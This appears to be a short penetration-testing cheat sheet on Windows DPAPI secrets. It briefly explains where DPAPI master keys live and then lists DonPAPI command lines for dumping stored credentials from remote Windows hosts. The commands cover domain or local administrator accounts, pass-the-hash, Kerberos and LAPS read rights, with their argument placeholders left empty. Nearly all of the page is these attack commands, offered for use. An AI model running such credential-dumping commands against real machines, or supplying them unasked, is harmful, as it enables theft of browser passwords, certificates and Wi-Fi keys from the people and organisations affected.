# DPAPI secrets ## Overview Windows uses the DPAPI (Data Protection API) to store sensitive data for various applications, such as Outlook, Web browsers and more. Windows also uses DPAPI to store certificates, Wi-Fi credentials, etc. The DPAPI data is secured by a user-specific master key and is stored within a users directory: `C:\Users\\AppData\Roaming\Microsoft\Protect` ## Remotely Dumping The DPAPI can be dumped **remotely** using DonPapi. However, a users password is required. * **Dump all secrets using a domain administrator account (requires local administrator):** ``` DonPAPI /:@ ``` **Dump all secrets using a local administrator account:** ``` DonPAPI -local_auth @ ``` **Dump secrets using a users password hash (Pass-The-Hash attack):** ``` DonPAPI --hashes : /@ ``` **Dump secrets using kerberos:** ``` DonPAPI -k /@ ``` **Dump secrets using a user with LAPS password reading rights:** ``` DonPAPI -laps /:@ ```